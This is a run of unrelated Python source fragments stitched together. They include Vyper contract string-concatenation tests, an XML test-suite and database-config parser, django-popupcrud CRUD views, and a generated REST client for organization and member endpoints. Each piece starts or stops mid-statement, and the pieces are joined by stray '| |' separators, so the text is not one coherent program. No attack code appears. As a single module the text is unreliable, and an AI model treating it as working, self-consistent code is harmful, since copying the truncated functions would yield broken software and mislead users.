c = get_contract(test_concat2)
assert c.foo(b"horse" * 9 + b"viper") == (b"horse" * 9 + b"viper") * 10
print('Passed second concat test')
def test_crazy_concat_code():
crazy_concat_code = """
y: bytes <= 10
def krazykonkat(z: bytes <= 10) -> bytes <= 25:
x = "cow"
self.y = "horse"
return concat(x, " ", self.y, " ", z)
"""
c = get_contract(crazy_concat_code)
assert c.krazykonkat(b"moose") == b'cow horse moose'
print('Passed third concat test')
def test_string_literal_code():
string_literal_code = """
def foo() -> bytes <= 5:
return "horse"
def bar() -> bytes <= 10:
return concat("b", "a", "d", "m", "i", "", "nton")
def baz() -> bytes <= 40:
return concat("0123456789012345678901234567890", "12")
def baz2() -> bytes <= 40:
return concat("01234567890123456789012345678901", "12")
def baz3() -> bytes <= 40:
return concat("0123456789012345678901234567890", "1")
def baz4() -> bytes <= 100:
return concat("01234567890123456789012345678901234567890123456789",
"01234567890123456789012345678901234567890123456789")
"""
c = get_contract(string_literal_code)
assert c.foo() == b"horse"
assert c.bar() == b"badminton"
assert c.baz() == b"012345678901234567890123456789012"
assert c.baz2() == b"0123456789012345678901234567890112"
assert c.baz3() == b"01234567890123456789012345678901"
assert c.baz4() == b"0123456789" * 10
print("Passed string literal test")
def test_kode():
for i in range(95, 96, 97):
kode = """
moo: bytes <= 100
def foo(s: num, L: num) -> bytes <= 100:
x = 27
r = slice("%s", start=s, | |
suite_soup):
"""
Returns a dict with information about 1 Suite from Test-Suites XML.
The "suite" must be a XML Soup class.
"""
logFull('xmlparser:getSuiteInfo')
# A suite can be a part of only 1 EP !
res = OrderedDict()
# The first parameter is the Suite name
if suite_soup.getparent().xpath('id'):
res['suite'] = suite_soup.getparent().xpath('id')[0].text
else:
res['suite'] = ''
# Add properties from PROJECT
prop_keys = self.configTS.xpath('/Root/UserDefined/propName')
prop_vals = self.configTS.xpath('/Root/UserDefined/propValue')
res.update(dict(zip([k.text for k in prop_keys], [v.text for v in prop_vals])))
# Add property/ value tags from Suite
prop_keys = suite_soup.xpath('UserDefined/propName')
prop_vals = suite_soup.xpath('UserDefined/propValue')
res.update(dict(zip([k.text for k in prop_keys], [v.text for v in prop_vals])))
res['type'] = 'suite'
# Get Suite ID from testsuites.xml
res['id'] = suite_soup.xpath('ID')[0].text
# The first parameter is the EP name
res['ep'] = suite_soup.xpath('EpId')[0].text
# Parse all known Suites Tags
for tag_dict in SUITES_TAGS:
# Create default entry
res[tag_dict['name']] = tag_dict['default']
# Update value from XML
if suite_soup.xpath(tag_dict['tag'] + '/text()'):
value = suite_soup.xpath(tag_dict['tag'])[0].text
if not value.strip():
continue
res[tag_dict['name']] = value
return res
def getFileInfo(self, file_soup):
"""
Returns a dict with information about 1 File from Test-Suites XML.
The "file" must be a XML class.
"""
logFull('xmlparser:getFileInfo')
res = OrderedDict()
res['type'] = 'file'
# Get File ID from testsuites.xml
res['id'] = file_soup.xpath('ID')[0].text
# The second parameter is the Suite name
res['suite'] = file_soup.getparent().xpath('id')[0].text
# Parse all known File Tags
for tag_dict in TESTS_TAGS:
# Create default entry
res[tag_dict['name']] = tag_dict['default']
# Exception for config files
if tag_dict['name'] == '_cfg_files':
cfg_files = []
for cfg_soup in file_soup.xpath(tag_dict['tag']):
if cfg_soup.get('enabled').lower() == 'true':
cfg = {
'name': cfg_soup.get('name'),
'iter_default': cfg_soup.get('iterator_default'),
'iter_sof': cfg_soup.get('iterator_sof')
}
cfg_files.append(cfg)
if cfg_files:
res[tag_dict['name']] = cfg_files
# Update value from XML
elif file_soup.xpath(tag_dict['tag'] + '/text()'):
value = file_soup.xpath(tag_dict['tag'])[0].text
if not value.strip():
continue
res[tag_dict['name']] = value
# Inject this empty variable
res['twister_tc_revision'] = '-1'
# Add property/ value tags
prop_keys = file_soup.xpath('Property/propName')
prop_vals = file_soup.xpath('Property/propValue')
params = ''
# The order of the properties is important!
for i in range(len(prop_keys)):
p_key = prop_keys[i].text
p_val = prop_vals[i].text
# Param tags are special
if p_key == 'param':
params += p_val + ','
p_val = params
res[p_key] = p_val
return res
# # # Database Parser # # #
class DBParser(object):
"""
Requirements: LXML.
This parser will parse DB.xml and Shared_DB.xml.
"""
def __init__(self, user, config_data, shared_data=None, use_shared_db=True):
self.user = user
self.db_config = {}
self.config_data = config_data
self.user_xml = None
self.shared_xml = None
self.use_shared_db = use_shared_db
if os.path.isfile(config_data):
data = localFs.read_user_file(self.user, config_data)
try:
self.user_xml = etree.fromstring(data)
# logDebug('User `{}` loaded priv DB config from file `{}`.'.format(user, config_data))
except Exception:
raise Exception('Invalid DB config file `{}`, '\
'for user `{}`!'.format(config_data, self.user))
elif config_data and isinstance(config_data, str) or isinstance(config_data, unicode):
try:
self.user_xml = etree.fromstring(config_data)
# logDebug('User `{}` loaded priv DB config from a string.'.format(user))
except Exception:
raise Exception('Cannot parse DB config data, for user `{}`!'.format(self.user))
else:
raise Exception('Invalid config data type: `{}`, '\
'for user `{}`!'.format(type(config_data), self.user))
if shared_data:
if os.path.isfile(shared_data):
data = localFs.read_user_file(self.user, shared_data)
try:
self.shared_xml = etree.fromstring(data)
# logDebug('User `{}` loaded shared DB config from file `{}`.'.format(user, shared_data))
except Exception:
raise Exception('Invalid shared DB config file `{}`, '\
'for user `{}`!'.format(shared_data, self.user))
elif shared_data and isinstance(shared_data, str) or isinstance(shared_data, unicode):
try:
self.shared_xml = etree.fromstring(shared_data)
# logDebug('User `{}` loaded shared DB config from a string.'.format(user))
except Exception:
logWarning('Cannot parse shared DB config data, for user `{}`!'.format(self.user))
else:
raise Exception('Invalid shared config data type: `{}`, '\
'for user `{}`!'.format(type(shared_data), self.user))
# The servers list is used to know how to connect to a specific server name
self.db_config['servers'] = {}
if self.user_xml.xpath('db_config/server/text()') and self.user_xml.xpath('db_config/database/text()'):
# User's server and database
db_server = self.user_xml.xpath('db_config/server')[0].text
db_name = self.user_xml.xpath('db_config/database')[0].text
db_user = self.user_xml.xpath('db_config/user')[0].text
db_passwd = self.user_xml.xpath('db_config/password')[0].text
self.db_config['default_server'] = (db_server, db_name, db_user, db_passwd, 'U')
self.db_config['servers']['User'] = self.db_config['default_server']
else:
raise Exception('Invalid DB config, no server and DB, for user `{}`!'.format(self.user))
if shared_data and self.shared_xml is not None:
# Servers list
try:
db_server = self.shared_xml.xpath('db_config/server')[0].text
db_name = self.shared_xml.xpath('db_config/database')[0].text
db_user = self.shared_xml.xpath('db_config/user')[0].text
db_passwd = self.shared_xml.xpath('db_config/password')[0].text
self.db_config['servers']['Shared'] = (db_server, db_name, db_user, db_passwd, 'S')
except Exception as err:
logWarning('Invalid shared DB XML, for user `{}`: {}!'.format(self.user, err))
self.shared_xml = None
def get_inserts(self, db_cfg_role=True):
"""
Used by Database Manager.
Returns a list with all insert fields and queries.
"""
logFull('dbparser:get_inserts')
insert_queries = OrderedDict()
# If user has the roles and Use Shared DB is disabled (user DB enabled)
if db_cfg_role and not self.use_shared_db:
# Fields and Inserts from private db.xml
private_db = {}
private_db['inserts'] = [q.text for q in self.user_xml.xpath('insert_section/sql_statement')]
fields = OrderedDict()
for field in self.user_xml.xpath('insert_section/field'):
data = {}
data['id'] = field.get('ID', '')
data['type'] = field.get('Type', '')
data['query'] = field.get('SQLQuery', '')
data['level'] = field.get('Level', '') # Project / Suite / Testcase
fields[data['id']] = data
private_db['fields'] = fields
private_db['shared_db'] = False
# Add private db to inserts
db_pair = self.db_config['default_server']
insert_queries[db_pair] = private_db
# Return after user db inserts !
return insert_queries
if self.shared_xml is None:
logWarning('Invalid shared DB XML on get inserts, for user `{}`!'.format(self.user))
return insert_queries
# Invalid entry ?
if not self.shared_xml.xpath('db_config/server/text()') or \
not self.shared_xml.xpath('db_config/database/text()'):
logWarning('Invalid shared DB XML on get inserts, for user `{}`!'.format(self.user))
return insert_queries
# Important MySQL server info
db_server = self.shared_xml.xpath('db_config/server')[0].text
db_name = self.shared_xml.xpath('db_config/database')[0].text
db_user = self.shared_xml.xpath('db_config/user')[0].text
db_passwd = self.shared_xml.xpath('db_config/password')[0].text
db_pair = (db_server, db_name, db_user, db_passwd, 'S')
# Insert fields
fields = OrderedDict()
for field in self.shared_xml.xpath('insert_section/field'):
data = {}
data['id'] = field.get('ID', '')
data['type'] = field.get('Type', '')
data['query'] = field.get('SQLQuery', '')
data['level'] = field.get('Level', '') # Project / Suite / Testcase
fields[data['id']] = data
# Insert queries
inserts = []
for elem in self.shared_xml.xpath('insert_section/sql_statement'):
inserts.append(elem.text.strip())
# Save this info
insert_queries[db_pair] = {
'inserts': inserts,
'fields': fields,
'shared_db': True
}
# Return after shared db inserts !
return insert_queries
def get_query(self, field_id):
"""
Used by the applet.
"""
logFull('dbparser:get_query')
res = self.user_xml.xpath('insert_section/field[@ID="%s"]' % field_id)
if not res:
logWarning('User {}: Cannot find field ID `{}`!'.format(self.user, field_id))
return False
query = res[0].get('SQLQuery')
return query
def get_reports(self, db_cfg_role=True):
"""
Used by Reporting Server.
Returns a list with all report fields and queries.
"""
logFull('dbparser:get_reports')
report_queries = OrderedDict()
def get_fields(server_data, srv_name):
"""
All report fields.
"""
fields = OrderedDict()
for field in server_data.xpath('reports_section/field'):
data = {}
data['id'] = field.get('ID', '')
data['type'] = field.get('Type', '')
data['label'] = field.get('Label', data['id'])
data['sqlquery'] = field.get('SQLQuery', '')
data['srv_name'] = srv_name
fields[data['id']] = data
return fields
def get_reps(server_data, srv_name):
"""
All reports.
"""
reports = OrderedDict()
for report in server_data.xpath('reports_section/report'):
data = {}
data['id'] = report.get('ID', '')
data['type'] = report.get('Type', '')
data['path'] = report.get('Path', '')
data['folder'] = report.get('Folder', '')
data['sqlquery'] = report.get('SQLQuery', '')
data['sqltotal'] = report.get('SQLTotal', '') # SQL Total Query
data['sqlcompr'] = report.get('SQLCompare', '') # SQL Query Compare side by side
data['srv_name'] = srv_name # Save server name here
reports[data['id']] = data
return reports
def get_redirects(server_data, srv_name):
"""
All redirects.
"""
redirects = OrderedDict()
for redirect in server_data.xpath('reports_section/redirect'):
data = {}
data['id'] = redirect.get('ID', '')
data['path'] = redirect.get('Path', '')
data['srv_name'] = srv_name
redirects[data['id']] = data
return redirects
# If the user has the roles AND Use Shared DB is disabled (user DB enabled)
if db_cfg_role and not self.use_shared_db:
# Insert user DB first and shared DB second
db_pair = self.db_config['default_server']
# Reports and Redirects from private db.xml
report_queries[db_pair] = {
'fields': get_fields(self.user_xml, 'User'),
'reports': get_reps(self.user_xml, 'User'),
'redirects': get_redirects(self.user_xml, 'User')
}
if not self.use_shared_db and not db_cfg_role:
logInfo('Insufficient privileges to get user reports, for user `{}`!'.format(self.user))
# Valid shared db.xml
if self.shared_xml is None:
logWarning('Invalid shared DB XML on get reports, for user `{}`!'.format(self.user))
return report_queries
# Invalid entry ?
if not self.shared_xml.xpath('db_config/server/text()') or \
not self.shared_xml.xpath('db_config/database/text()'):
logWarning('Invalid shared DB XML on get reports, for user `{}`!'.format(self.user))
return report_queries
# Important MySQL server info
db_server = self.shared_xml.xpath('db_config/server')[0].text
db_name = self.shared_xml.xpath('db_config/database')[0].text
db_user = self.shared_xml.xpath('db_config/user')[0].text
db_passwd = self.shared_xml.xpath('db_config/password')[0].text
db_pair = (db_server, db_name, db_user, db_passwd, 'S')
# Overwrite all private fields, reports or redirects
if db_pair in report_queries:
report_queries[db_pair]['fields'].update(get_fields(self.shared_xml, 'Shared'))
report_queries[db_pair]['reports'].update(get_reps(self.shared_xml, 'Shared'))
report_queries[db_pair]['redirects'].update(get_redirects(self.shared_xml, 'Shared'))
# Save this info
else:
report_queries[db_pair] = {
'fields': get_fields(self.shared_xml, 'Shared'),
'reports': get_reps(self.shared_xml, 'Shared'),
'redirects': | |
<reponame>muxuezi/django-popupcrud
# -*- coding: utf-8 -*-
# pylint: disable=too-many-lines
""" Popupcrud views """
from collections import OrderedDict
import copy
from django import forms
from django.db import transaction
from django.conf import settings
from django.conf.urls import include, url
from django.core.exceptions import (
FieldDoesNotExist, ObjectDoesNotExist)
from django.shortcuts import render_to_response
from django.views import generic
from django.http import JsonResponse
from django.template import loader
from django.contrib.auth.mixins import PermissionRequiredMixin
from django.contrib import messages
from django.utils.decorators import classonlymethod
from django.utils.translation import ugettext_lazy as _, ugettext, override
from django.utils.http import urlencode
from django.utils import six
from django.utils.safestring import mark_safe
from django.utils.functional import cached_property
#from django.contrib.admin import ModelAdmin
from pure_pagination import PaginationMixin
from .widgets import RelatedFieldPopupFormWidget
POPUPCRUD_DEFAULTS = {
'base_template': 'base.html',
'page_title_context_variable': 'page_title',
'paginate_by': 10,
}
"""django-popupcrud global settings are specified as the dict variable
``POPUPCRUD`` in settings.py.
``POPUPCRUD`` currently supports the following settings with their
default values:
- ``base_template``: The prjoject base template from which all popupcrud
templates should be derived.
Defaults to ``base.html``.
- ``page_title_context_variable``: Name of the context variable whose value
will be set as the title for the CRUD list view page. This title is
specified as the value for the class attribute ``ViewSet.page_title`` or
as the return value of ``ViewSet.get_page_title()``.
Defaults to ``page_title``.
- ``paginate_by``: Default number of rows per page for queryset pagination.
This is the same as ListView.paginate_by.
Defaults to 10.
"""
# build effective settings by merging any user settings with defaults
POPUPCRUD = POPUPCRUD_DEFAULTS.copy()
POPUPCRUD.update(getattr(settings, 'POPUPCRUD', {}))
ALL_VAR = 'all'
ORDER_VAR = 'o'
ORDER_TYPE_VAR = 'ot'
PAGE_VAR = 'p'
SEARCH_VAR = 'q'
ERROR_FLAG = 'e'
IGNORED_PARAMS = (
ALL_VAR, ORDER_VAR, ORDER_TYPE_VAR, SEARCH_VAR)
DEFAULT_MODAL_SIZES = {
'create_update': 'normal',
'delete': 'normal',
'detail': 'normal',
}
class AjaxObjectFormMixin(object):
"""
Mixin facilitates single object create/edit functions to be performed
through an AJAX request.
Views that provide the feature of creating/editing model objects
via AJAX requests should derive from this class.
So if CRUD for a model wants to allow creation of its objects via a popup,
its CreateView should include this mixin in its derivation chain. Such a
view an also support its objects being created from the view for another
model which has a ForeignKey into it and wants to provide 'inline-creation'
of releated objects from a popup without leaving the context of the model
object view being created/edited.
"""
def get_context_data(self, **kwargs):
if 'formset' not in kwargs:
formset = self._viewset.get_formset()
if formset:
kwargs['formset'] = formset
return super(AjaxObjectFormMixin, self).get_context_data(**kwargs)
def get_ajax_response(self):
return JsonResponse({
'name': str(self.object), # object representation
'pk': self.object.pk # object id
})
# following two methods are applicable only to Create/Edit views
def get_form_class(self):
if getattr(self._viewset, 'form_class', None):
return self._viewset.form_class
return super(AjaxObjectFormMixin, self).get_form_class()
def get_form(self, form_class=None):
form = super(AjaxObjectFormMixin, self).get_form(form_class)
if not getattr(self._viewset, 'form_class', None):
self._init_related_fields(form)
return form
def _init_related_fields(self, form):
related_popups = getattr(self._viewset, 'related_object_popups', {})
for fname in related_popups:
if fname in form.fields:
_ = form.fields[fname]
if isinstance(form.fields[fname], forms.ModelChoiceField):
form.fields[fname].widget = RelatedFieldPopupFormWidget(
widget=forms.Select(choices=form.fields[fname].choices),
new_url=related_popups[fname])
@transaction.atomic
def form_valid(self, form): # pylint: disable=missing-docstring
self.object = form.save(commit=False)
formset_class = self._viewset.formset_class
formset = None
if formset_class:
formset = formset_class(
self.request.POST,
instance=self.object)
if not formset or formset.is_valid():
self.object.save()
form.save_m2m()
if formset:
formset.save()
if self.request.is_ajax():
return self.get_ajax_response()
return super(AjaxObjectFormMixin, self).form_valid(form)
kwargs = {'form': form}
if formset:
kwargs.update({'formset': formset})
return self.render_to_response(self.get_context_data(**kwargs))
def handle_no_permission(self):
if self.request.is_ajax():
return render_to_response('popupcrud/403.html')
return super(AjaxObjectFormMixin, self).handle_no_permission()
class AttributeThunk(object):
"""
Class thunks various attributes expected by Django generic CRUD views as
properties of the parent viewset class instance. This allows us to
normalize all CRUD view attributes as ViewSet properties and/or methods.
"""
def __init__(self, viewset, *args, **kwargs):
self._viewset = viewset() # Sat 9/9, changed to store Viewset object
# instead of viewset class
self._viewset.view = self # allow viewset methods to access view
super(AttributeThunk, self).__init__(*args, **kwargs)
@property
def model(self):
return self._viewset.model
@property
def fields(self):
return self._viewset.fields
@property
def context_object_name(self):
return self._viewset.context_object_name
@property
def pk_url_kwarg(self):
return self._viewset.pk_url_kwarg
@property
def slug_field(self):
return self._viewset.slug_field
@property
def slug_url_kwarg(self):
return self._viewset.slug_url_kwarg
def get_success_url(self):
return self._viewset.get_list_url()
def get_form_kwargs(self):
kwargs = super(AttributeThunk, self).get_form_kwargs() # pylint: disable=E1101
kwargs.update(self._viewset.get_form_kwargs())
return kwargs
def get_context_data(self, **kwargs):
kwargs['base_template'] = POPUPCRUD['base_template']
title_cv = POPUPCRUD['page_title_context_variable']
kwargs[title_cv] = kwargs['pagetitle'] #self._viewset.get_page_title()
kwargs['viewset'] = self._viewset
kwargs[self._viewset.breadcrumbs_context_variable] = \
copy.deepcopy(self._viewset.get_breadcrumbs())
if not self.request.is_ajax() and not isinstance(self, ListView): # pylint: disable=E1101
# for legacy crud views, add the listview url to the breadcrumb
kwargs[self._viewset.breadcrumbs_context_variable].append(
(self._viewset.get_page_title('list'), self._viewset.get_list_url()))
self._viewset.get_context_data(kwargs)
return super(AttributeThunk, self).get_context_data(**kwargs) # pylint: disable=E1101
@property
def login_url(self):
# If view specific attribute is set in PopupCrudViewSet, return it.
# Otherwise, return the ViewSet global 'login_url' attr value.
return getattr(self._viewset,
"%s_login_url" % self._get_view_code(),
self._viewset.login_url)
@property
def raise_exception(self):
# If view specific attribute is set in PopupCrudViewSet, return it.
# Otherwise, return the ViewSet global 'raise_exception' attr value.
return getattr(self._viewset,
"%s_raise_exception" % self._get_view_code(),
self._viewset.raise_exception)
def get_permission_required(self):
return self._viewset.get_permission_required(self._get_view_code())
def _get_view_code(self):
""" Returns the short code for this ViewSet view """
codes = {
'ListView': 'list',
'DetailView': 'detail',
'CreateView': 'create',
'UpdateView': 'update',
'DeleteView': 'delete'
}
return codes[self.__class__.__name__]
@property
def media(self):
popups = self._viewset.popups
# don't load popupcrud.js if all crud views are set to 'legacy'
popupcrud_media = forms.Media(
css={'all': ('popupcrud/css/popupcrud.css',)},
js=('popupcrud/js/popupcrud.js',))
# Optimization: add the form and formset media only if we're either
# (CreateView or UpdateView) or in a ListView with popups enabled for
# either of 'create' or 'update' operation.
if isinstance(self, (CreateView, UpdateView)) or \
popups['create'] or popups['update']:
# Can't we load media of forms created using modelform_factory()?
# Need to investigate.
if self._viewset.form_class:
popupcrud_media += self._viewset.form_class(
**self._viewset.get_form_kwargs()).media
formset_class = self._viewset.formset_class
if formset_class:
popupcrud_media.add_js(('popupcrud/js/jquery.formset.js',))
fs_media = formset_class().media
popupcrud_media += fs_media
return popupcrud_media
class ListView(AttributeThunk, PaginationMixin, PermissionRequiredMixin,
generic.ListView):
""" Model list view """
def __init__(self, viewset_cls, *args, **kwargs):
super(ListView, self).__init__(viewset_cls, *args, **kwargs)
request = kwargs['request']
self.params = dict(request.GET.items())
self.query = request.GET.get(SEARCH_VAR, '')
self.lookup_opts = self.model._meta
def get_paginate_by(self, queryset):
return self._viewset.get_paginate_by()
def get_queryset(self):
qs = super(ListView, self).get_queryset()
qs = self._viewset.get_queryset(qs)
# Apply any filters
# Set ordering.
ordering = self._get_ordering(self.request, qs)
qs = qs.order_by(*ordering)
# Apply search results
return qs
def get_template_names(self):
templates = super(ListView, self).get_template_names()
# if the viewset customized listview template, make sure that is
# looked for first by putting its name in the front of the list
if getattr(self._viewset, 'list_template', None):
templates.insert(0, self._viewset.list_template)
# make the default template of lower priority than the one
# determined by default -- <model>_list.html
templates.append("popupcrud/list.html")
return templates
def get_context_data(self, **kwargs):
kwargs['pagetitle'] = self._viewset.get_page_title('list')
context = super(ListView, self).get_context_data(**kwargs)
context['model_options'] = self._viewset.model._meta
context['new_button_text'] = ugettext("New {0}").format(
self._viewset.model._meta.verbose_name)
context['new_url'] = self._viewset.get_new_url()
context['new_item_dialog_title'] = ugettext("New {0}").format(
self.model._meta.verbose_name)
context['edit_item_dialog_title'] = ugettext("Edit {0}").format(
self.model._meta.verbose_name)
context['legacy_crud'] = self._viewset.legacy_crud
modal_sizes = copy.deepcopy(DEFAULT_MODAL_SIZES)
modal_sizes.update(self._viewset.modal_sizes)
context['modal_sizes'] = modal_sizes
return context
def _get_default_ordering(self):
ordering = []
if self._viewset.ordering:
ordering = self._viewset.ordering
elif self.lookup_opts.ordering:
ordering = self.lookup_opts.ordering
return ordering
def get_ordering_field(self, field_name):
"""
Returns the proper model field name corresponding to the given
field_name to use for ordering. field_name may either be the name of a
proper model field or the name of a method (on the admin or model) or a
callable with the 'order_field' attribute. Returns None if no
proper model field name can be matched.
"""
try:
field = self.lookup_opts.get_field(field_name)
return field.name
except FieldDoesNotExist:
# See whether field_name is a name of a non-field
# that allows sorting.
if callable(field_name):
attr = field_name
elif hasattr(self._viewset, field_name):
attr = getattr(self._viewset, field_name)
else:
attr = getattr(self.model, field_name)
return getattr(attr, 'order_field', None)
def _get_ordering(self, request, queryset):
"""
Returns the list of ordering fields for the change list.
First we check the get_ordering() method in model admin, then we check
the object's default ordering. Then, any manually-specified ordering
from the query string overrides anything. Finally, a deterministic
order is guaranteed by ensuring the primary key is used as the last
ordering field.
"""
params = self.params
ordering = list(self._get_default_ordering())
if ORDER_VAR in params:
# Clear ordering and used params
ordering = []
order_params = params[ORDER_VAR].split('.')
for p in order_params:
try:
_, pfx, idx = p.rpartition('-')
field_name = self._viewset.list_display[int(idx)]
order_field = self.get_ordering_field(field_name)
if not order_field:
continue # No 'order_field', skip it
# reverse order if order_field has already "-" as prefix
if order_field.startswith('-') and pfx == "-":
ordering.append(order_field[1:])
else:
ordering.append(pfx + order_field)
except (IndexError, ValueError):
continue # Invalid ordering specified, skip it.
# Add the given query's ordering fields, if any.
ordering.extend(queryset.query.order_by)
# Ensure that the primary key | |
timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ["owner"]
all_params.extend(
[
"async_req",
"_return_http_data_only",
"_preload_content",
"_request_timeout",
]
)
for key, val in six.iteritems(local_var_params["kwargs"]):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_organization" % key
)
local_var_params[key] = val
del local_var_params["kwargs"]
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and (
"owner" not in local_var_params
or local_var_params["owner"] is None # noqa: E501
): # noqa: E501
raise ApiValueError(
"Missing the required parameter `owner` when calling `delete_organization`"
) # noqa: E501
collection_formats = {}
path_params = {}
if "owner" in local_var_params:
path_params["owner"] = local_var_params["owner"] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params["Accept"] = self.api_client.select_header_accept(
["application/json"]
) # noqa: E501
# Authentication setting
auth_settings = ["ApiKey"] # noqa: E501
return self.api_client.call_api(
"/api/v1/orgs/{owner}",
"DELETE",
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get("async_req"),
_return_http_data_only=local_var_params.get(
"_return_http_data_only"
), # noqa: E501
_preload_content=local_var_params.get("_preload_content", True),
_request_timeout=local_var_params.get("_request_timeout"),
collection_formats=collection_formats,
)
def delete_organization_member(self, owner, user, **kwargs): # noqa: E501
"""Delete organization member details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_organization_member(owner, user, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str user: Memeber under namesapce (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs["_return_http_data_only"] = True
return self.delete_organization_member_with_http_info(
owner, user, **kwargs
) # noqa: E501
def delete_organization_member_with_http_info(
self, owner, user, **kwargs
): # noqa: E501
"""Delete organization member details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_organization_member_with_http_info(owner, user, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str user: Memeber under namesapce (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ["owner", "user"]
all_params.extend(
[
"async_req",
"_return_http_data_only",
"_preload_content",
"_request_timeout",
]
)
for key, val in six.iteritems(local_var_params["kwargs"]):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_organization_member" % key
)
local_var_params[key] = val
del local_var_params["kwargs"]
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and (
"owner" not in local_var_params
or local_var_params["owner"] is None # noqa: E501
): # noqa: E501
raise ApiValueError(
"Missing the required parameter `owner` when calling `delete_organization_member`"
) # noqa: E501
# verify the required parameter 'user' is set
if self.api_client.client_side_validation and (
"user" not in local_var_params
or local_var_params["user"] is None # noqa: E501
): # noqa: E501
raise ApiValueError(
"Missing the required parameter `user` when calling `delete_organization_member`"
) # noqa: E501
collection_formats = {}
path_params = {}
if "owner" in local_var_params:
path_params["owner"] = local_var_params["owner"] # noqa: E501
if "user" in local_var_params:
path_params["user"] = local_var_params["user"] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params["Accept"] = self.api_client.select_header_accept(
["application/json"]
) # noqa: E501
# Authentication setting
auth_settings = ["ApiKey"] # noqa: E501
return self.api_client.call_api(
"/api/v1/orgs/{owner}/members/{user}",
"DELETE",
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get("async_req"),
_return_http_data_only=local_var_params.get(
"_return_http_data_only"
), # noqa: E501
_preload_content=local_var_params.get("_preload_content", True),
_request_timeout=local_var_params.get("_request_timeout"),
collection_formats=collection_formats,
)
def get_organization(self, owner, **kwargs): # noqa: E501
"""Get organization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_organization(owner, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1Organization
If the method is called asynchronously,
returns the request thread.
"""
kwargs["_return_http_data_only"] = True
return self.get_organization_with_http_info(owner, **kwargs) # noqa: E501
def get_organization_with_http_info(self, owner, **kwargs): # noqa: E501
"""Get organization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_organization_with_http_info(owner, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1Organization, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ["owner"]
all_params.extend(
[
"async_req",
"_return_http_data_only",
"_preload_content",
"_request_timeout",
]
)
for key, val in six.iteritems(local_var_params["kwargs"]):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_organization" % key
)
local_var_params[key] = val
del local_var_params["kwargs"]
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and (
"owner" not in local_var_params
or local_var_params["owner"] is None # noqa: E501
): # noqa: E501
raise ApiValueError(
"Missing the required parameter `owner` when calling `get_organization`"
) # noqa: E501
collection_formats = {}
path_params = {}
if "owner" in local_var_params:
path_params["owner"] = local_var_params["owner"] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params["Accept"] = self.api_client.select_header_accept(
["application/json"]
) # noqa: E501
# Authentication setting
auth_settings = ["ApiKey"] # noqa: E501
return self.api_client.call_api(
"/api/v1/orgs/{owner}",
"GET",
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type="V1Organization", # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get("async_req"),
_return_http_data_only=local_var_params.get(
"_return_http_data_only"
), # noqa: E501
_preload_content=local_var_params.get("_preload_content", True),
_request_timeout=local_var_params.get("_request_timeout"),
collection_formats=collection_formats,
)
def get_organization_member(self, owner, user, **kwargs): # noqa: E501
"""Get organization member details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_organization_member(owner, user, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str user: Memeber under namesapce (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
